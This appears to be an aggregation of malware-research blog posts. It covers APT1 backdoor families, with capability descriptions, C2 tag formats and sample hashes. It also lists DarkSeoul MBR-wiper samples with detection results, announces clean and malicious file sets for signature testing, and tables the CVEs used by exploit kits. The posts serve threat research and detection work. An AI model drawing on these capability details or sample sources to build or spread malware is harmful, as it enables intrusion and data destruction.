This family of malware provides a backdoor over the network to the attackers. It
is configured to connect to a single host and offers file download over HTTP,
program execution, and arbitrary execution of commands through a cmd.exe
instance.
> SWORD_sample_052F5DA1734464A985DCD669BFF62F93
25. TABMSGSQL aka TROJAN LETSGO
http://www.cyberengineeringservices.com/trojan-letsgo-analysis/
This malware family is a full-featured backdoor capable of file uploading and
downloading, arbitrary execution of programs, and providing a remote interactive
command shell.
All communications with the C2 server are sent over HTTP to a static URL,
appending various URL parameters to the request. Some variants use a slightly
different URL.
> TABMSGSQL_sample_001DD76872D80801692FF942308C64E6
> TABMSGSQL_sample_2F930D92DC5EBC9D53AD2A2B451EBF65
> TABMSGSQL_sample_3E87051B1DC3463F378C7E1FE398DC7D
> TABMSGSQL_sample_8A86DF3D382BFD1E4C4165F4CACFDFF8
> TABMSGSQL_sample_052EC04866E4A67F31845D656531830D
> TABMSGSQL_sample_002325A0A67FDED0381B5648D7FE9B8E
> TABMSGSQL_sample_55886D571C2A57984EA9659B57E1C63A
Contagio sample for TABMSDSQL - LETSGO
DC1286AAC46B0EAD7B27F045E5B09EFF Conference Materials.zip (dropper)
26. TARSIP-ECLIPSE
The TARSIP malware family is a backdoor which communicates over encoded
information in HTTPS headers. Typical TARSIP malware samples will only beacon
out to their C2 servers if the C2 DNS address resolves to a specific address.
The capability of TARSIP backdoors includes file uploading, file downloading,
interactive command shells, process enumeration, process creation, process
termination. The TARSIP-ECLIPSE family is distinguished by the presence of
'eclipse' in .pdb debug strings present in the malware samples. It does not
provide a built in mechanism to maintain persistence.
> TARSIP-ECLIPSE_sample_0B506C6DDE8D07F9EEB82FD01A6F97D4
> TARSIP-ECLIPSE_sample_4A54D7878D4170C3D4E3C3606365C42C
> TARSIP-ECLIPSE_sample_4F763B07A7B8A80F1F9408E590F79532
> TARSIP-ECLIPSE_sample_3107DE21E480AB1F2D67725F419B28D0
> TARSIP-ECLIPSE_sample_8934AEED5D213FE29E858EEE616A6EC7
> TARSIP-ECLIPSE_sample_123505024F9E5FF74CB6AA67D7FCC392
> TARSIP-ECLIPSE_sample_CA327BC83FBE38B3689CD1A5505DFC33
27. TARSIP-MOON
The TARSIP malware family is a backdoor which communicates over encoded
information in HTTPS headers. Typical TARSIP malware samples will only beacon
out to their C2 servers if the C2 DNS address resolves to a specific address.
The capability of TARSIP backdoors includes file uploading, file downloading,
interactive command shells, process enumeration, process creation, process
termination. The TARSIP-MOON family is distinguished by the presence of 'moon'
in .pdb debug strings present in the malware samples. It does not provide a
built in mechanism to maintain persistence.
> TARSIP-MOON_sample_2BD02B41817D227058522CCA40ACD390
> TARSIP-MOON_sample_95F25D3AFC5370F5D9FD8E65C17D3599
> TARSIP-MOON_sample_0908D8B3E459551039BADE50930E4C1B
> TARSIP-MOON_sample_6808EC6DBB23F0FA7637C108F44C5C80
> TARSIP-MOON_sample_A5D4EBC0285F0213E0C29D23BC410889
> TARSIP-MOON_sample_C91EACAB7655870764D13BA741AA9A73
28. WARP
The WARP malware family is an HTTP based backdoor written in C++, and the
majority of its code base is borrowed from source code available in the public
domain. Network communications are implemented using the same WWW client
library (w3c.cpp) available from www.dankrusi.com/file_69653F3336383837.html.
The malware has system survey functionality (collects hostname, current user,
system uptime, CPU speed, etc.) taken directly from the BO2K backdoor available
from www.bo2k.com. It also contains the hard disk identification code found at
www.winsim.com/diskid32/diskid32.cpp. When the WARP executing remote commands,
the malware creates a copy of the ?%SYSTEMROOT%\system32\cmd.exe? file as
'%USERPROFILE%\Temp\~ISUN32.EXE'. The version signature information of the
duplicate executable is zeroed out. Some WARP variants maintain persistence
through the use of DLL search order hijacking.
no sample
29 WEBC2-ADSPACE
A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2
server. It expects the Web page to contain special HTML tags; the backdoor will
attempt to interpret the data between the tags as commands. This family of
malware is capable of downloading and executing a file. All variants
represented here are the same file with different MD5 signatures. This malware
attempts to contact its C2 once a week (Thursday at 10:00 AM). It looks for
commands inside a set of HTML tags, part of which are in the File Strings
indicator term below.
> WEBC2-ADSPACE_sample_AB00B38179851C8AA3F9BC80ED7BAA23
30. WEBC2-AUSOV
A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2
server. It expects the Web page to contain special HTML tags; the backdoor will
attempt to interpret the data between the tags as commands. This malware family
is a only a downloader which operates over the HTTP protocol with a hard-coded
URL. If directed, it has the capability to download, decompress, and execute
compressed binaries.
> WEBC2-AUSOV_sample_6E442C5EF460BEE4C9457C6BF7A132D6
> WEBC2-AUSOV_sample_097B5ABB53A3D84FA9EABDA02FEF9E91
> WEBC2-AUSOV_sample_A40E20FF8B991308F508239625F275D8
> WEBC2-AUSOV_sample_D262CB8267BEB0E218F6D11D6AF9052E
31 WEBC2-BOLID
A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2
server. It expects the Web page to contain special HTML tags; the backdoor will
attempt to interpret the data between the tags as commands. This family of
malware is a backdoor capable of downloading files and updating its
configuration.
Communication with the command and control (C2) server uses a combination of
single-byte XOR and Base64 encoded data wrapped in standard HTML tags. The
malware family installs a registry key as a persistence mechanism.
> WEBC2-BOLID_sample_1EA61A0945BDE3C6F41E12BC01928D37
> WEBC2-BOLID_sample_5FF3269FACA4A67D1A4C537154AAAD4B
> WEBC2-BOLID_sample_53B263DD41838AA178A5CED338A207F3
> WEBC2-BOLID_sample_9675827A495F4BA6A4EFD4DD70932B7C
> WEBC2-BOLID_sample_D8238E950608E5ABA3D3E9E83E9EE2CC
32. WEBC2-CLOVER
A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2
server. It expects the Web page to contain special HTML tags; the backdoor will
attempt to interpret the data between the tags as commands. The family of
malware provides the attacker with an interactive command shell, the ability to
upload and download files, execute commands on the system, list processes and
DLLs, kill processes, and ping hosts on the local network. Responses to these
commands are encrypted and compressed before being POSTed to the server. Some
variants copy cmd.exe to Updatasched.exe in a temporary directory, and then may
launch that in a process if an interactive shell is called. On initial
invocation, the malware also attempts to delete previous copies of the
Updatasched.exe file.
> WEBC2-CLOVER_sample_2FCCAA39533DE02490B1C6395878DD79
> WEBC2-CLOVER_sample_29C691978AF80DC23C4DF96B5F6076BB
> WEBC2-CLOVER_sample_065E63AFDFA539727F63AF7530B22D2F
33. WEBC2-CSON
A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2
server. It expects the Web page to contain special HTML tags; the backdoor will
attempt to interpret the data between the tags as commands. Members of this
family of malware act only as downloaders and droppers for other malware. They
communicate with a hard-coded C2 server, reading commands embedded in HTML
comment fields. Some variants are executables which act upon execution, others
are DLLs which can be attached to services or loaded through search order
hijacking.
> WEBC2-CSON_sample_7D3140BD028F70F1FA865364B69C5999
> WEBC2-CSON_sample_50F35B7C86AEDE891A72FCB85F06B0B7
> WEBC2-CSON_sample_73D125F84503BD87F8142CF2BA8AB05E
> WEBC2-CSON_sample_575836EBB1B8849F04E994E9160370E4
> WEBC2-CSON_sample_4192479B055B2B21CB7E6C803B765D34
> WEBC2-CSON_sample_277964807A66AEEB6BD81DBFCAA3E4E6
> WEBC2-CSON_sample_A38A367D6696BA90B2E778A5A4BF98FD
> WEBC2-CSON_sample_D22863C5E6F098A4B52688B021BEEF0A
> WEBC2-CSON_sample_F1E5D9BF7705B4DC5BE0B8A90B73A863
> WEBC2-CSON_sample_F802B6E448C054C9C16B97FF85646825
34. WEBC2-DIV
The WEBC2 malware family is designed to retrieve a Web page from a
pre-determined C2 server. It expects the Web page to contain special HTML tags;
the backdoor will attempt to interpret the data between the tags as commands.
The WEBC2-DIV variant searches for the strings "div safe:" and " balance" to
delimit encoded C2 information. If the decoded string begins with the letter "J"
the malware will parse additional arguments in the decoded string to specify the
sleep interval to use. WEBC2-DIV is capable of downloading a file, downloading
and executing a file, or sleeping a specified interval.
> WEBC2-DIV_sample_1E5EC6C06E4F6BB958DCBB9FC636009D
35 WEBC2-GREENCAT
A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2
server. It expects the Web page to contain special HTML tags; the backdoor will
attempt to interpret the data between the tags as commands. This malware is a
variant on the GREENCAT family, using a fixed web C2. This family is a full
featured backdoor which provides remote command execution, file transfer,
process and service enumeration and manipulation. It installs itself
persistently through the current user's registry Run key.
> WEBC2-GREENCAT_sample_1CE4605E771A04E375E0D1083F183E8E
> WEBC2-GREENCAT_sample_36C0D3F109AEDE4D76B05431F8A64F9E
> WEBC2-GREENCAT_sample_55FB1409170C91740359D1D96364F17B
> WEBC2-GREENCAT_sample_BA0C4D3DBF07D407211B5828405A9B91
> WEBC2-GREENCAT_sample_E54CE5F0112C9FDFE86DB17E85A5E2C5
> WEBC2-GREENCAT_sample_E83F60FB0E0396EA309FAF0AED64E53F
36. WEBC2-HEAD
The WEBC2 malware family is designed to retrieve a Web page from a
pre-determined C2 server. It expects the Web page to contain special HTML tags;
the backdoor will attempt to interpret the data between the tags as commands.
The WEBC2-HEAD variant communicates over HTTPS, using the system's SSL
implementation to encrypt all communications with the C2 server. WEBC2-HEAD
first issues an HTTP GET to the host, sending the Base64-encoded string
containing the name of the compromised machine running the malware.
> WEBC2-HEAD_sample_7B42B35832855AB4FF37AE9B8FA9E571
> WEBC2-HEAD_sample_88C7C50CD4130561D57A1D3B82C5B953
> WEBC2-HEAD_sample_165EF79E7CAA806F13F82CC2BBF3DEDD
> WEBC2-HEAD_sample_649D54BC9EEF5A60A4B9D8B889FEE139
> WEBC2-HEAD_sample_973F4A238D6D19BDC7B42977B07B9CEF
> WEBC2-HEAD_sample_B74022A7B9B63FDC541AE0848B28A962
> WEBC2-HEAD_sample_C4C638750526E28F68D6D71FD1266BDF
> WEBC2-HEAD_sample_C9172B3E83C782BC930C06B628F31FA5
> WEBC2-HEAD_sample_EC8C89AA5E521572C74E2DD02A4DAF78
> WEBC2-HEAD_sample_F627990BBE2EC5C48C180F724490C332
37 WEBC2-KT3
The WEBC2 malware family is designed to retrieve a Web page from a
pre-determined C2 server. It expects the Web page to contain special HTML tags;
the backdoor will attempt to interpret the data between the tags as commands.
The WEBC2-KT3 variant searches for commands in a specific comment tag. Network
traffic starting with *!Kt3+v| may indicate WEBC2-KT3 activity.
> WEBC2-KT3_sample_EC3A2197CA6B63EE1454D99A6AE145AB
38 WEBC2-QBP
The WEBC2 malware family is designed to retrieve a Web page from a
pre-determined C2 server. It expects the Web page to contain special HTML tags;
the backdoor will attempt to interpret the data between the tags as commands.
The WEBC2-QBP variant will search for two strings in a HTML comment. The first
will be "2010QBP " followed by " 2010QBP//--". Inside these tags will be a
DES-encrypted string.
> WEBC2-QBP_sample_929802A27737CEBC59D19DA724FDF30A
> WEBC2-QBP_sample_C04C796EF126AD7429BE7D55720FE392
> WEBC2-QBP_sample_CF9C2D5A8FBDD1C5ADC20CFC5E663C21
39 WEBC2-RAVE
A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2
server. It expects the Web page to contain special HTML tags; the backdoor will
attempt to interpret the data between the tags as commands. This family of
malware will set itself up as a service and connect out to a hardcoded web page
and read a modified base64 string from this webpage. The later versions of this
malware supports three commands (earlier ones are just downloaders or reverse
shells). The first commands will sleep the malware for N number of hours. The
second command will download a binary from the encoded HTML comment and execute
it on the infected host. The third will spawn an encoded reverse shell to an
attacker specified location and port.
> WEBC2-RAVE_sample_5BCAA2F4BC7567F6FFD5507A161E221A
> WEBC2-RAVE_sample_9F11BC08AF048C5C3A110E567082FE0B
> WEBC2-RAVE_sample_438983192903F3FECF77500A39459EE6
> WEBC2-RAVE_sample_A2534E9B7E4146368EA3245381830EB0
> WEBC2-RAVE_sample_BDD2AD4C0E1E5667D117810AE9E36C4B
> WEBC2-RAVE_sample_BF0EE4367EA32F8E3B911C304258E439
40. WEBC2-TABLE
The WEBC2 malware family is designed to retrieve a Web page from a
pre-determined C2 server. It expects the Web page to contain special HTML tags;
the backdoor will attempt to interpret the data between the tags as commands.
The WEBC2-TABLE variant looks for web pages containing 'background', 'align',
and 'bgcolor' tags to be present in the requested Web page. If the data in
these tags are formatted correctly, the malware will decode a second URL and a
filename. This URL is then retrieved, written to the decoded filename and
executed.
> WEBC2-TABLE_sample_7A7A46E8FBC25A624D58E897DEE04FFA
41 WEBC2-TOCK
The WEBC2 malware family is designed to retrieve a Web page from a
pre-determined C2 server. It expects the Web page to contain special HTML tags;
the backdoor will attempt to interpret the data between the tags as commands.
The WEBC2-TOCK variant looks for tags which include the name of the system in
them as a parameter. If those tags are formed correctly, the malware will
decode the payload URL from the web page, then download and execute the payload.
no samples
42. WEBC2-UGX
A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2
server. It expects the Web page to contain special HTML tags; the backdoor will
attempt to interpret the data between the tags as commands. Members of this
family of malware provide remote command shell and remote file download and
execution capabilities.
The malware downloads a web page containing a crafted HTML comment that
subsequently contains an encoded command. The contents of this command tell the
malware whether to download and execute a program, launch a reverse shell to a
specific host and port number, or to sleep for a period of time.
> WEBC2-UGX_sample_4B19A2A6D40A5825E868C6EF25AE445E
> WEBC2-UGX_sample_54D5D171A482278CC8EACF08D9175FD7
> WEBC2-UGX_sample_56DE2854EF64D869B5DF7AF5E4EFFE3E
> WEBC2-UGX_sample_75DAD1CCABAE8ADEB5BAE899D0C630F8
> WEBC2-UGX_sample_8462A62F13F92C34E4B89A7D13A185AD
43. WEBC2-Y21K
A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2
server. It expects the Web page to contain special HTML tags; the backdoor will
attempt to interpret the data between the tags as commands. Members of this
family of backdoor malware talk to specific Web-based Command & Control (C2)
servers. The backdoor has a limited command set, depending on version. It is
primarily a downloader, but it classified as a backdoor because it can accept a
limited command set, including changing local directories, downloading and
executing additional files, sleeping, and connecting to a specific IP & port not
initially included in the instruction set for the malware. Each version of the
malware has at least one hardcoded URL to which it connects to receive its
initial commands. This family of malware installs itself as a service, with the
malware either being the executable run by the service, or the service DLL
loaded by a legitimate service. The same core code is seen recompiled on
different dates or with different names, but the same functionality. Key
signatures include a specific set of functions (some of which can be used with
the OS-provided rundll32.exe tool to install the malware as a service), and
hardcoded strings used in communication with C2 servers to issue commands to the
implant.
> WEBC2-Y21K_sample_4CABFAEF26FD8E5AEC01D0C4B90A32F3
> WEBC2-Y21K_sample_225E33508861984DD2A774760BFDFC52
> WEBC2-Y21K_sample_2479A9A50308CB72FCD5E4E18EF06468
44. WEBC2-YAHOO
The WEBC2 malware family is designed to retrieve a Web page from a
pre-determined C2 server. It expects the Web page to contain special HTML tags;
the backdoor will attempt to interpret the data between the tags as commands.
The WEBC2-YAHOO variant enters a loop where every ten minutes it attempts to
download a web page that may contain an encoded URL. The encoded URL will be
found in the pages returned inside an attribute named 'sb' or 'ex' within a tag
named 'yahoo'. The embedded link can direct the malware to download and execute
files.
> WEBC2-YAHOO_sample_2B659D71AE168E774FAAF38DB30F4A84
> WEBC2-YAHOO_sample_4C9C9DBF388A8D81D8CFB4D3FC05F8E4
> WEBC2-YAHOO_sample_7A670D13D4D014169C4080328B8FEB86
> WEBC2-YAHOO_sample_36D5C8FC4B14559F73B6136D85B94198
> WEBC2-YAHOO_sample_37DDD3D72EAD03C7518F5D47650C8572
> WEBC2-YAHOO_sample_0149B7BD7218AAB4E257D28469FDDB0D
> WEBC2-YAHOO_sample_1415EB8519D13328091CC5C76A624E3D
> WEBC2-YAHOO_sample_A8F259BB36E00D124963CFA9B86F502E
> WEBC2-YAHOO_sample_AA4F1ECC4D25B33395196B5D51A06790
> WEBC2-YAHOO_sample_CC3A9A7B026BFE0E55FF219FD6AA7D94
> WEBC2-YAHOO_sample_F7F85D7F628CE62D1D8F7B39D8940472
DARKSEOUL - JOKRA - MBR WIPER SAMPLES
March 20, 2013, 9:29 pm
Next 16,800 clean and 11,960 malicious files for signature testing and research.
Previous Mandiant APT1 samples categorized by malware families
0
0
Image may be NSFW.
Clik here to view.
If all you needed for happiness is to destroy a few virtual machines, here are
the samples for today's headline maker.
The malware overwrites master boot record (MBR) as described here:
* Trojan.Jokra - Symantec
* DarkSeoul: SophosLabs identifies malware used in South Korean internet attack
* South Korean Banks, Media Companies Targeted by Destructive Malware - McAfee
* South Korean Banks and Broadcasting Organizations Suffer Major Damage from
Cyber Attack - Symantec.
Download
Image may be NSFW.
Clik here to view.Download. Email me if you need the password
Download dc789dee20087c5e1552804492b042cd linux shell script
File Information
9263E40D9823AECF9388B64DE34EAE54 DarkSeoulDropper
dc789dee20087c5e1552804492b042cd linux shell script
5FCD6E1DACE6B0599429D913850F0364
0A8032CD6B4A710B1771A080FA09FB87
DB4BBDC36A78A8807AD9B15A562515C4
F0E045210E3258DAD91D7B6B4D64E7F3
E4F66C3CD27B97649976F6F0DAAD9032 - (Oct 19, 2012)- older sample
50E03200C3A0BECBF33B3788DAC8CD46 (Aug 30, 2012) - older sample
Automatic Scans
SHA256:422c767682bee719d85298554af5c59cf7e48cf57daaf1c5bdd87c5d1aab40cc
SHA1:bf823cfee2b2072efb7fed11898eb235e2b3c1ed
MD5:9263e40d9823aecf9388b64de34eae54
File size:417.5 KB ( 427520 bytes )
File type:Win32 EXE
Tags:peexe upx
Detection ratio: 14 / 45
Analysis date: 2013-03-21 01:23:59 UTC ( 2 hours, 55 minutes ago )
AhnLab-V3 Dropper/Eraser.427520 20130320
AntiVir TR/KillMBR.Y.2 20130320
Commtouch W32/Warezov.gen2!W32DL 20130320
DrWeb Trojan.KillFiles.10563 20130321
F-Prot W32/Warezov.gen2!W32DL 20130321
Microsoft Trojan:Win32/Dembr.A 20130320
NANO-Antivirus Virus.Win32.Gen.ccmw 20130321
nProtect Trojan/W32.Agent.427520.EJ 20130320
PCTools Trojan.Jokra 20130321
Symantec Trojan.Jokra 20130321
TrendMicro-HouseCall TROJ_GEN.F47V0320 20130321
VBA32 BScope.Trojan.MTA.0161 20130320
ViRobot Dropper.S.Agent.427520.A 20130320
SHA256:239ed753232d3cc0e75323d16d359150937934d30da022628e575997c8dd60a2
SHA1:9f69da40dda6367789041aaff01cf61d562b7c21
MD5:5fcd6e1dace6b0599429d913850f0364
File size:24.0 KB ( 24576 bytes )
File name:239ed753232d3cc0e75323d16d359150937934d30da022628e575997c8dd60a2
File type:Win32 EXE
Tags:peexe
Detection ratio: 16 / 45
Analysis date: 2013-03-21 00:33:17 UTC ( 3 hours, 48 minutes ago )
AhnLab-V3 Win-Trojan/Agent.24576.JPG 20130320
AntiVir TR/KillMBR.Y.1 20130320
ClamAV Win.Trojan.Agent-257543 20130320
DrWeb Trojan.KillFiles.10563 20130321
Fortinet W32/Pak.ACED1!tr 20130320
Malwarebytes Trojan.MBR.Killer 20130320
McAfee KillMBR-FBIA 20130320
McAfee-GW-Edition Artemis!5FCD6E1DACE6 20130320
NANO-Antivirus Virus.Win32.Gen.ccmw 20130320
nProtect Trojan/W32.Agent.24576.EAO 20130320
PCTools Trojan.Jokra 20130321
Sophos Mal/EncPk-ACE 20130320
Symantec Trojan.Jokra 20130321
TrendMicro TROJ_INJECTO.BDE 20130320
TrendMicro-HouseCall TROJ_INJECTO.BDE 20130321
ViRobot Trojan.Win32.U.KillMBR.24576.A 20130320
16,800 CLEAN AND 11,960 MALICIOUS FILES FOR SIGNATURE TESTING AND RESEARCH.
March 23, 2013, 11:02 pm
Next CVE-2013-0804 Novell GroupWise 2012 Multiple Untrusted Pointer Dereferences
Exploitation by Brian Mariani & Frédéric Bourla
Previous DarkSeoul - Jokra - MBR wiper samples
0
0
Image may be NSFW.
Clik here to view.Signature and security product testing often requires large
numbers of sorted malicious and clean files to eliminate false positives and
negatives. They are not always easy to find, but here are some that I have.
Clean documents are collected from various open sources. All the copyright
rights belong the the authors of each document and file. You must not use the
documents for their content but only as samples of particular file types.
Download all
All files use the same password (scheme). Email me if you need the
password.
Image may be NSFW.
Clik here to view.16,800 CLEAN FILES
1. EXE
UTILITY FOR CLEAN EXE FILES
2. XLS(X), DOC(X), RTF
CLEAN MS OFFICE FILES AND RTF - 2000 FILES
3. ZIP, 7Z, RAR
CLEAN ARCHIVE FILES - 5500 FILES
4. JAR
CLEAN JAVA FILES - 100 FILES
5. PDF
PDF - 9000_files and PDF -100+with embed_3d_video_swf_ js
6. MACH-O
CLEAN OSX MACH-O FILES - 50 FILES
7. ELF
CLEAN ELF LINUX FILES - 46 FILES
Image may be NSFW.
Clik here to view. 11,960 MALICIOUS FILES
1. PDF
MALWARE PDF NEW -170 FILES MALWARE PDF PRE_04-2011_10982_files
2.
RTF, XLS
MALWARE RTF_CVE-2010-3333_RTF_92files
MALWARE_RTF_CVE-2012-0158_300_files
MALWARE_ENCRYPTED_XLS_16files
3. MACH-O
MALWARE_MACHO_OSX_100_FILES
4. ELF
MALWARE_ELF_LINUX_100_FILES
5. JAR
6. MALWARE JAVA (JAR) - 200 FILES
DETAILED LISTING OF CLEAN FILES
1. WINDOWS EXECUTABLES
EXE
Windows executables. I am not posting any because you can quickly generate your
own from any vm.
See exe collect utility by Stephan
Chenette. https://github.com/IOActive/SearchAndCollect
2. CLEAN MS OFFICE FILES AND RTF - 2,000 FILES
DOC, DOCX, XLS, XLSX, RTF
RTF - 200_files
XLSX -100_files
XLS_300_files
DOCX_100_files
DOC_1300_files
3. CLEAN ARCHIVE FILES - 5,500 FILES
7z, ZIP, RAR
Encrypted and not.
7z_w_EXE+DLL_1000_files_nopass
RAR_EXE+DLL_1000_files_encryptedname_pass_123qwe
RAR_EXE+DLL_1000_files_pass_password123
RAR_OFFICE+PDF_500_files_pass_1234!@#$
ZIP_w_EXE+DLL_1000_files_nopass
ZIP_w_EXE+DLL_1000_files_pass_password123
P.S. - please remove _185-1 (86).rar
from RAR_OFFICE+PDF_500_files_pass_1234!@#$ as it is not clean, accidental
sneak in. It was already removed in the current set.
4. CLEAN JAVA FILES - 100 FILES
JAR
CLEAN_JAR_100_files
5. CLEAN ADOBE READER FILES - 9,100 FILES
PDF
PDF - 9000_files
PDF -100+__embed_3d_video_swf_ js - clean pdf documents with special features -
embedded javascript, 3d objects, flash, video, etc.
6. CLEAN OSX MACH-O FILES - 50 FILES
7. CLEAN ELF LINUX FILES - 46 FILES
These 4 files were removed as questionable (perl2elf utility with obfuscated
perl code)
0fdb34f48166dae57ff410d723efd3f7
4020b92f05661260f5ed3fe642eb0ace
a1faa486be2303697d13d26cca576f27
f7536bb412d6c4573fd6fd819e1b07bb
DETAILED LISTING OF MALICIOUS FILES
1. MALWARE ADOBE READER FILES -11,152 FILES
PDF
PDF-XDP _3files
CVE-2013-0640_PDF_21files
CVE-2012-0754_PDF_1file
CVE-2011-2462_PDF_25files
CVE-2010-0188_PDF_49files
CVE_2010-2883_PDF_25files
MALWARE_PDF_PRE_04-2011_10982_files - files from web exploit packs - older than
April 2011.
2. MALWARE MS OFFICE AND RTF FILES -
RTF, XLS
MALWARE RTF_CVE-2010-3333_RTF_92files
MALWARE_RTF_CVE-2012-0158_300_files
MALWARE_ENCRYPTED_XLS_16files - CVE-2012-0158
3. MALWARE_MACHO_OSX_100_FILES
4. MALWARE_ELF_LINUX_100_FILES
5. MALWARE JAVA (JAR) - 200 FILES
Search
RSSing.com
--------------------------------------------------------------------------------
CVE-2013-0804 NOVELL GROUPWISE 2012 MULTIPLE UNTRUSTED POINTER DEREFERENCES
EXPLOITATION BY BRIAN MARIANI & FRÉDÉRIC BOURLA
April 16, 2013, 9:55 pm
Next CVE-2013-0640 samples listing
Previous 16,800 clean and 11,960 malicious files for signature testing and
research.
0
0
Image may be NSFW.
Clik here to view.
This is another excellent publication by Brian Mariani & Frédéric Bourla (High
Tech Bridge) describing their discovery and research of CVE-2013-0804 Novell
GroupWise 2012 Multiple Untrusted Pointer Dereferences Exploitation
CVE-2013-0804
The client in Novell GroupWise 8.0 before 8.0.3 HP2 and 2012 before SP1 HP1
allows remote attackers to execute arbitrary code or cause a denial of service
(incorrect pointer dereference) via unspecified vectors.
You can download it from here: High Tech Bridge Novell GroupWise 2012 Multiple
Untrusted Pointer Dereferences Exploitation by Brian Mariani & Frédéric Bourla
CVE-2013-0640 SAMPLES LISTING
April 23, 2013, 9:42 pm
Next An Overview of Exploit Packs (Update 19.1) April 2013
Previous CVE-2013-0804 Novell GroupWise 2012 Multiple Untrusted Pointer
Dereferences Exploitation by Brian Mariani & Frédéric Bourla
0
0
Image may be NSFW.
Clik here to view.This is a detailed MD5 listing of CVE-2013-0640 pdf files that
were posted earlier. I got a few requests for samples that were already posted
as a pack in this post ( 16,800 clean and 11,960 malicious files for signature
testing and research.) Now you can see them in all their glory below.
I can post listings for other malware from that large post if there is need and
interest.
Image may be NSFW.
Clik here to view.PDF
MALWARE PDF NEW -170 FILES MALWARE PDF PRE_04-2011_10982_files
* Vinsula. CVE-2013-0640 – Further Investigation into an Adobe PDF Zero-day
Malware Attack
* Kaspersky: The MiniDuke Mystery: PDF 0-day Government Spy Assembler 0x29A
Micro Backdoor
0CDF55626E56FFBF1B198BEB4F6ED559 report.pdf2
151ADD98EEC006F532C635EA3FC205CE action_plan.pdf_
2A42BF17393C3CAAA663A6D1DADE9C93 Mandiant.pdf_
3119ABBA449D16355CEB385FD778B525 mousikomi.pdf_
3668B018B4BB080D1875AEE346E3650A action_plan.pdf_
37A9C45B78F4DEE9DA8FD8019F66005A sample.pdf_
3F301758AA3D5D123A9DDBAD1890853B EUAG_report.pdf_
6945E1FBEF586468A6D4F0C4F184AF8B report.pdf_
7005E9EE9F673EDAD5130B3341BF5E5F 2013-Yilliq Noruz Bayram Merikisige
Teklip.pdf_
701E3F3973E8A8A7FCEC5F8902ECBFD9 701E3F3973E8A8A7FCEC5F8902ECBFD9
88292D7181514FDA5390292D73DA28D4 ASEM_Seminar.pdf_
8E3B08A46502C5C4C45D3E47CEB38D5A cc08_v143.pdf_
9C572606A22A756A1FCC76924570E92A pdf.pdf_
A7C89D433F737B3FDC45B9FFBC947C4D A7C89D433F737B3FDC45B9FFBC947C4D
AD668992E15806812DD9A1514CFC065B arp.pdf_
AE52908370DCDF6C150B6E2AD3D8B11B AE52908370DCDF6C150B6E2AD3D8B11B
AF061F8C63CD1D4AD83DC2BF81F36AF8 readme.pdf_
C03BCB0CDE62B3F45B4D772AB635E2B0 The 2013 Armenian Economic Association.pdf_
D00E4AC94F1E4FF67E0E0DFCF900C1A8 ???.pdf_
EF90F2927421D61875751A7FE3C7A131 action_plan.pdf3
F3B9663A01A73C5ECA9D6B2A0519049E Visaform Turkey.pdf_
AN OVERVIEW OF EXPLOIT PACKS (UPDATE 19.1) APRIL 2013
April 27, 2013, 10:00 pm
Next DeepEnd Research - Library of Malware Traffic Patterns
Previous CVE-2013-0640 samples listing
0
0
Image may be NSFW.
Clik here to view.
The Explot Pack Table has been updated and you can view it here.
Exploit Pack Table Update 19.1 - View or Download from Google Apps
If you keep track of exploit packs and can/wish to contribute and be able to
make changes, please contact me (see email in my profile)
I want to thank L0NGC47, Fibon, and Kafeine, Francois Paget, Eric Romang, and
other researchers who sent information for their help.
Update April 28, 2013 - added CVE-2013-2423 (Released April 17, 2013) to several
packs.
Now the following packs serve the latest Java exploit (update your Java!)
1. Styx
2. Sweet Orange
3. Neutrino
4. Sakura
5. Whitehole
6. Cool
7. Safe Pack
8. Crime Boss
9. CritX
Other changes
Updated:
1. Whitehole
2. Redkit
3. Nuclear
4. Sakura
5. Cool Pack
6. Blackhole
7. Gong Da
Added:
1. KaiXin
2. Sibhost
3. Popads
4. Alpha Pack
5. Safe Pack
6. Serenity
7. SPL Pack
There are 5 tabs in the bottom of the sheet
1. 2011-2013
2. References
3. 2011 and older
4. List of exploit kits
5. V. 16 with older credits
Image may be NSFW.
Clik here to view.
March 2013
The Explot Pack Table, which has been just updated, has migrated to Google Apps
- the link is below. The new format will allow easier viewing and access for
those who volunteered their time to keep it up to date.
In particular, I want to thank
L0NGC47, Fibon, and Kafeine for their help.
There are 5 tabs in the bottom of the sheet
1. 2011-2013
2. References
3. 2011 and older
4. List of exploit kits
5. V. 16 with older credits
The updates include
1. Neutrino - new
2. Cool Pack - update
3. Sweet Orange - update
4. SofosFO aka Stamp EK - new
5. Styx 2.0 - new
6. Impact - new
7. CritXPack - new
8. Gong Da - update
9. Redkit - update
10. Whitehole - new
11. Red Dot - new
Image may be NSFW.
Clik here to view.The long overdue Exploit pack table Update 17 is finally here.
It got a colorful facelift and has newer packs (Dec. 2011-today) on a separate
sheet for easier reading.
Updates / new entries for the following 13 packs have been added (see exploit
listing below)
1. Redkit
2. Neo Sploit
3. Cool Pack
4. Black hole 2.0
5. Black hole 1.2.5
6. Private no name
7. Nuclear 2.2 (Update to 2.0 - actual v. # is unknown)
8. Nuclear 2.1 (Update to 2.0 - actual v. # is unknown)
9. CrimeBoss
10. Grandsoft
11. Sweet Orange 1.1 Update to 1.0 actual v. # is unknown)
12. Sweet Orange 1.0
13. Phoenix 3.1.15
14. NucSoft
15. Sakura 1.1 (Update to 1.0 actual v. # is unknown)
16. AssocAID (unconfirmed)
The full table in xls format - Version 17 can be downloaded from here.
Image may be NSFW.
Clik here to view.
Exploit lists for the added/updated packs
AssocAID (unconfirmed)
09-'12
CVE-2011-3106
CVE-2012-1876
CVE-2012-1880
CVE-2012-3683
Unknown CVE
5
Redkit
08-'12
CVE-2010-0188
CVE-2012-0507
CVE-2012-4681
3
Neo Sploit
09-'12
CVE-2012-1723
CVE-2012-4681
2?
Cool
08-'12
CVE-2006-0003
CVE-2010-0188
CVE-2011-3402
CVE-2012-0507
CVE-2012-1723
CVE-2012-4681
5
Black hole 2.0
09-'12
CVE-2006-0003
CVE-2010-0188
CVE-2012-0507
CVE-2012-1723
CVE-2012-4681
CVE-2012-4969 promised
5
Black hole 1.2.5
08-'12
CVE-2006-0003
CVE-2007-5659 /2008-0655
CVE-2008-2992
CVE-2009-0927
CVE-2010-0188
CVE-2010-1885
